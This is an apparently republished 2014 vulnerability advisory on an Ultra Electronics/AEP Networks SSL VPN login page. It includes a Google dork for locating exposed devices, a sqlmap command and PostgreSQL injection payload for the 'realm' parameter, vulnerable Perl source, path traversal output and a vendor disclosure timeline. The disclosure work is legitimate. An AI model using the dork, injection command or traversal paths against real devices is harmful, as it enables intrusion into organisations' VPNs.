Ultra Electronics – Multiple Vulnerabilities

  • 作者: OSI Security
    日期: 2014-10-06
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/34918/
  • Ultra Electronics / AEP Networks - SSL VPN (Netilla / Series A / Ultra
    Protect) Vulnerabilities
    Release Date:
     Ultra Electronics - Series A
    Versions tested:
     Version and have been confirmed as vulnerable. Other
    versions untested.
    Google Dork: inurl:/preauth/login.cgi
    Page 1 of about 321 results (0.25 seconds)
    There are a few different issues with the 'realm' parameter.
    1) SQL injection. You can use sqlmap for this.
    ./sqlmap.py -u "https://[target]/preauth/login.cgi?realm=abc" --level 5
    sqlmap identified the following injection points with a total of 927
    HTTP(s) requests:
    Place: GET
    Parameter: realm
    Type: boolean-based blind
    Title: PostgreSQL stacked conditional-error blind queries
    Payload: realm=-2661'); SELECT (CASE WHEN (9569=9569) THEN 9569
    ELSE 1/(SELECT 0) END);--
    web application technology: Apache
    back-end DBMS operating system: Linux Red Hat
    back-end DBMS: PostgreSQL
    banner:'PostgreSQL 8.3.4 on x86_64-redhat-linux-gnu, compiled by
    GCC gcc (GCC) 4.1.2 20070626 (Red Hat 4.1.2-14)'
    Funnily enough, a lot of the source code is commented with things like
    "#FIXME add param validation" as a reminder by the developer that the
    code doesn't validate input - but somehow made it into production.
    DB.pm line ~189 where realm is used in an SQL select:
    sub set_message {
    my $self = shift;
    warn(__PACKAGE__, "::set_message() called\n") if $self->{'debug'};
    my ($key, $value) = @_; # FIXME add param validation
    my $realm_name=$self->{'realm'};
    my $c = $self->{'_dbh'};
    my $locale = $self->{'locale'} ;
    my $r= $c->exec("
    select * from set_realm_message('$realm_name',
    '$locale', '$key', '$value')
    if ($r->resultStatus ne PGRES_TUPLES_OK) {
    my $retval = $r->fetchrow;
    return $retval;
    2) The realm is also used in a perl based mkdir(). This allows you to
    create arbitrary folders, allows for path disclosure / checking files
    exist etc.
    Manager.pm line ~43:
    chown $uid, $gid, mkpath($path, 0);
    File.pm line ~160:
    my $parent = File::Basename::dirname($path);
    unless (-d $parent or $path eq $parent) {
    push(@created,mkpath($parent, $verbose, $mode));
    print "mkdir $path\n" if $verbose;
    mkdir /tmp/netilla-cache/C11N_get_messages/../../../etc/hosts: File
    exists at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm
    line 43
    mkdir /tmp/netilla-cache/C11N_get_messages/../../../../bin: Permission
    denied at /usr/lib/perl5/site_perl/5.8.8/Netilla/CONDA/Cache/Manager.pm
    line 43
    The portal requires authentication to access "protected" areas but
    once you are authenticated, you can HTTP GET internal device
    configuration files and other resources that an authenticated user
    shouldn't be able to read.
     This vulnerability was discovered by Patrick Webster.
    Disclosure timeline:
     28-May-2012 - Discovered during test.
     28-May-2012 - Vendor contact, referred to support and legal departments.
     19-Jun-2012 - Requested vendor update.
     20-Jun-2012 - Told to contact support email. Sent.
     19-Jul-2012 - Support request to close ticket. Told support no
    progress has been made. Support requires CVE to progress.
     23-Jul-2012 - Told support no CVE has been assigned. Support refuse
    to investigate without a CVE. Told to upgrade to newest release Confirmed as affected.
     14-Aug-2012 - Vendor support closing ticket, no investigation or patch.
     02-Oct-2014 - Public disclosure. Assumed vulnerable.
     Note: Product is now known as NetillaOS by Northbridge Secure
    Systems. 2014 status unknown.
    About OSI Security:
     OSI Security is an independent network and computer security auditing
     and consulting company based in Sydney, Australia. We provide internal
     and external penetration testing, vulnerability auditing and wireless
     site audits, vendor product assessments, secure network design,
     forensics and risk mitigation services.
    We can be found at http://www.osisecurity.com.au/